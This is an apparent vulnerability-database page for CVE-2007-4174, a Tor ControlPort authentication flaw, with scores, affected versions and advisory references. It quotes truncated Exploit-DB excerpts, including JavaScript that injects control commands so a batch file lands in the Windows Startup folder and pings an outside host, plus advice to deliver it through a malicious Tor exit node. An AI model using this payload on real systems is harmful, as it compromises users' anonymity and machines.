CVE-2007-4174
published 2007-08-07CVE-2007-4174: Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict commands to localhost port 9051, which allows remote attackers to modify the torrc…
PriorityP338medium5.8CVSS 2.0
AVNACMAuNCPIPAN
EXPLOIT
EPSS
6.21%
92.7th percentile
Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict commands to localhost port 9051, which allows remote attackers to modify the torrc configuration file, compromise anonymity, and have other unspecified impact via HTTP POST data containing commands without valid authentication, as demonstrated by an HTML form (1) hosted on a web site or (2) injected by a Tor exit node.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | tor | < tor 0.1.2.16-1 (bookworm) | tor 0.1.2.16-1 (bookworm) |
| tor | tor | <= 0.1.2.15 | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| torproject | tor | >= 0 < 0.1.2.16-1 | 0.1.2.16-1 |
| torproject | tor | >= 0 < 0.1.2.16-1 | 0.1.2.16-1 |
| torproject | tor | >= 0 < 0.1.2.16-1 | 0.1.2.16-1 |
| torproject | tor | >= 0 < 0.1.2.16-1 | 0.1.2.16-1 |
CVSS provenance
nvdv2.05.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:N
osv5.8MEDIUM
vendor_debian5.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qprc-v4xr-fwgr: Tor before 0
ghsa_unreviewed·2022-05-01
CVE-2007-4174 [MEDIUM] GHSA-qprc-v4xr-fwgr: Tor before 0
Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict commands to localhost port 9051, which allows remote attackers to modify the torrc configuration file, compromise anonymity, and have other unspecified impact via HTTP POST data containing commands without valid authentication, as demonstrated by an HTML form (1) hosted on a web site or (2) injected by a Tor exit node.
OSV
CVE-2007-4174: Tor before 0
osv·2007-08-07·CVSS 5.8
CVE-2007-4174 [MEDIUM] CVE-2007-4174: Tor before 0
Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict commands to localhost port 9051, which allows remote attackers to modify the torrc configuration file, compromise anonymity, and have other unspecified impact via HTTP POST data containing commands without valid authentication, as demonstrated by an HTML form (1) hosted on a web site or (2) injected by a Tor exit node.
Debian
CVE-2007-4174: tor - Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict com...
vendor_debian·2007·CVSS 5.8
CVE-2007-4174 [MEDIUM] CVE-2007-4174: tor - Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict com...
Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict commands to localhost port 9051, which allows remote attackers to modify the torrc configuration file, compromise anonymity, and have other unspecified impact via HTTP POST data containing commands without valid authentication, as demonstrated by an HTML form (1) hosted on a web site or (2) injected by a Tor exit node.
Scope: local
bookworm: resolved (fixed in 0.1.2.16-1)
bullseye: resolved (fixed in 0.1.2.16-1)
forky: resolved (fixed in 0.1.2.16-1)
sid: resolved (fixed in 0.1.2.16-1)
trixie: resolved (fixed in 0.1.2.16-1)
No detection rules found.
Exploit-DB
Tor < 0.1.2.16 - ControlPort Remote Rewrite
exploitdb·2007-09-29
CVE-2007-4174 Tor < 0.1.2.16 - ControlPort Remote Rewrite
Tor t.bat which will run calc.exe on next boot.
This is not very silent though, t.bat will contain something like 45 rows of crap which the user will see in about 1 sec, drop me a mail if you have a better way.
Either have a TOR user visit this HTML or inject it into her traffic when you're a TOR exit.
If you inject, just replace with everything in + ( that's why I tried to fit everything inside ), and fix Content-Length
// elgCrew _AT_ safe-mail.net
-->
window.onload = function()
{
cmd = 'cls & echo off & ping -l 1329 my.tcpdump.co -n 1 -w 1 > NUL & del t.bat > NUL & exit';
inject = '\r\nAUTHENTICATE\r\nSETCONF Log=\"debug-debug file C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\t.bat\"\r\nSAVECONF\r\nSIGNAL RELOAD\r\nSETCONF ExitPolicy=\"reject*:
Exploit-DB
Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access
exploitdb·2007-08-02
CVE-2007-4174 Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access
Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access
---
source: https://www.securityfocus.com/bid/25188/info
Tor is prone to an unauthorized-access vulnerability due to a design error when handling multiple connections to the ControlPort.
An attacker can exploit this issue to reconfigure Tor and significantly weaken the anonymity provided by the software.
Tor 0.1.2.15 is confirmed vulnerable; previous versions may also be affected.
t.bat which will run calc.exe on next boot.
This is not very silent though, t.bat will contain something like 45
rows of crap which the user will see in about 1 sec, drop me a mail if
you have a better way.
Either have a TOR user visit this HTML or inject it into her traffic
when you're a TOR exit.
If you inject, just replace with every
No writeups or analysis indexed.
http://archives.seul.org/or/announce/Aug-2007/msg00000.htmlhttp://archives.seul.org/or/announce/Sep-2007/msg00000.htmlhttp://osvdb.org/36271http://secunia.com/advisories/26301http://www.securityfocus.com/bid/25188http://www.securitytracker.com/id?1018510http://www.vupen.com/english/advisories/2007/2768https://exchange.xforce.ibmcloud.com/vulnerabilities/35784https://exchange.xforce.ibmcloud.com/vulnerabilities/36407http://archives.seul.org/or/announce/Aug-2007/msg00000.htmlhttp://archives.seul.org/or/announce/Sep-2007/msg00000.htmlhttp://osvdb.org/36271http://secunia.com/advisories/26301http://www.securityfocus.com/bid/25188http://www.securitytracker.com/id?1018510http://www.vupen.com/english/advisories/2007/2768https://exchange.xforce.ibmcloud.com/vulnerabilities/35784https://exchange.xforce.ibmcloud.com/vulnerabilities/36407
2007-08-07
Published